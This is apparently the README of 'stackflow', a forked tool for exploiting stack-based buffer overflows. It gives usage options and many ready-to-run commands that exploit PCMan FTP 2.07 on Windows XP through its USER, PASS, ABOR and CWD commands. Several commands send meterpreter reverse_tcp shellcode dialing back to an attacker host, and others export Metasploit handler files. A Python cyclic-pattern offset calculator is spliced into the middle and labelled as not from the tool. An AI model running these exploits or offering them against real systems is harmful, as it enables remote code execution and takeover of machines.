0x6b7966 / stackflow

This project is a fork of d4rkcat/stackflow


Universal stack-based buffer overflow exploitation tool

License: GNU General Public License v2.0

Python 100.00%

stackflow

Universal stack-based buffer overflow exploitation tool

Usage

usage: ./stackflow.py OPTIONS

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        rhost
  -p RPORT, --rport RPORT
                        rport
  -c CMDS, --cmds CMDS  commands to send to server before overflow
  -v VULNCMD, --vulncmd VULNCMD
                        vulnerable command
  -o OFFSET, --offset OFFSET
                        offset to EIP
  -ao AUTOOFFSET, --autooffset AUTOOFFSET
                        calculate offset from cyclic pattern EIP string
  -a RETURNADD, --returnadd RETURNADD
                        return address
  -n NOPS, --nops NOPS  number of NOPS \x90 x 4 to prepend
  -m PAYLOAD, --payload PAYLOAD
                        MSF payload
  -i LHOST, --lhost LHOST
                        lhost
  -l LPORT, --lport LPORT
                        lport
  -f FUZZ, --fuzz FUZZ  Fuzz with cyclic pattern of size
  -t, --calc            Send calc.exe shellcode
  -t1, --cmdprompt      Send cmd.exe shellcode
  -d, --display         Display the exploit buffer
  -q, --quiet           Display less cruft
  -w TIMEOUT, --timeout TIMEOUT
                        Timeout for socket (Default: 5)
  -e CFEXPORT, --cfexport CFEXPORT
                        Export exploit config and metasploit rc file
  -g CFIMPORT, --cfimport CFIMPORT
                        Import and run exploit from config file
  -s STANDALONE, --standalone STANDALONE
                        Export exploit to a standalone python script

All options can be input via the command line or read from a config file.

Some examples for PCMan FTP 2.07 running on Windows XP SP3 (ENG):

Vulnerable app: http://www.exploit-db.com/wp-content/themes/exploit/applications/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z

Exploit without any commands and send meterpreter/reverse_tcp shellcode dialing back to 192.168.0.2 on port 4444:

./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2012 -m windows/meterpreter/reverse_tcp -a 7E429353

Exploit the USER command and send meterpreter/reverse_tcp shellcode dialing back to 192.168.0.2 on port 4444:

./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2007 -m windows/meterpreter/reverse_tcp -v 'USER' -a 7E429353

Exploit the PASS command and send calc.exe shellcode:

./stackflow.py -r 192.168.0.9 -p 21 -o 6103 -v 'PASS' -c 'USER anonymous' -a 7E429353 -t

Exploit the ABOR command and send meterpreter/bind_tcp shellcode listening on 4444:

./stackflow.py -r 192.168.0.9 -p 21 -o 2007 -v 'ABOR' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -l 4444 -m windows/meterpreter/bind_tcp

Exploit the CWD command and send cmd.exe shellcode and display the exploit buffer:

./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1 -d

Fuzz the STOR command with a cyclic buffer of size 3000:

./stackflow.py -r 192.168.0.9 -p 21 -v 'STOR' -c 'USER anonymous&PASS [email protected]' -f 3000

Exploit the CWD command with auto-offset string from EIP after fuzzing crash and send cmd.exe shellcode:

./stackflow.py -r 192.168.0.9 -p 21 -ao o9Cp -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1
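As an added illustration (not code from stackflow or its README), the Python below reproduces the cyclic-pattern bookkeeping behind -f and -ao so the numbers in the CWD example can be checked: a Metasploit-style "Aa0Aa1..." pattern of 3000 bytes is what -f 3000 sends, and the fragment o9Cp that the crash leaves in EIP sits at offset 2008, the same value the -o 2008 CWD example uses. Function names are my own and stackflow's internals may differ; the code also accepts the register value as a debugger prints it (little-endian, e.g. 0x7043396F) and refuses to answer when the fuzz buffer is longer than one pattern period, where a 4-byte fragment is no longer unique.

```python
import itertools
import string

# A Metasploit-style cyclic pattern ("Aa0Aa1Aa2...Zz9") is unique for every
# 4-byte window only within its first 26 * 26 * 10 * 3 = 20280 bytes.
PATTERN_PERIOD = 26 * 26 * 10 * 3


def cyclic_pattern(length):
    """Return `length` bytes of the Aa0Aa1... pattern, wrapping if length > 20280."""
    triples = itertools.cycle(
        u + l + d
        for u in string.ascii_uppercase
        for l in string.ascii_lowercase
        for d in string.digits
    )
    out, total = [], 0
    while total < length:
        out.append(next(triples))
        total += 3
    return "".join(out)[:length]


def eip_to_fragment(value):
    """Turn what a debugger shows in EIP into the 4-char fragment as it sat in the buffer.

    Accepts the ASCII fragment as stackflow's -ao takes it ("o9Cp") or a
    little-endian register value ("0x7043396F"), whose bytes are reversed.
    """
    if value.lower().startswith("0x"):
        return bytes.fromhex(value[2:])[::-1].decode("ascii")
    return value


def pattern_offset(value, length=PATTERN_PERIOD):
    """Offset of the EIP fragment inside a cyclic pattern of `length` bytes.

    Returns None if the fragment does not occur (the crash did not put pattern
    bytes into EIP) and raises ValueError if it occurs more than once, which
    happens as soon as the fuzz buffer is longer than one pattern period.
    """
    fragment = eip_to_fragment(value)
    pattern = cyclic_pattern(length)
    first = pattern.find(fragment)
    if first == -1:
        return None
    if pattern.find(fragment, first + 1) != -1:
        raise ValueError("fragment %r is not unique in a %d-byte pattern" % (fragment, length))
    return first


if __name__ == "__main__":
    # Values from the README's CWD example: -f 3000, then -ao o9Cp gives -o 2008.
    print(pattern_offset("o9Cp", 3000))  # 2008
```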

Export the exploit py and metasploit rc file:

./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -e revCWD -l 4444 -m windows/meterpreter/reverse_tcp -i 192.168.0.2

Start msfconsole and run the exploit and handler:

msfconsole -r revCWD.rc

Run the exploit and handler from msfconsole:

resource /path/to/revCWD.rc

Run an exploit from a config file (no handler!):

./stackflow.py -g revCWD(.py)
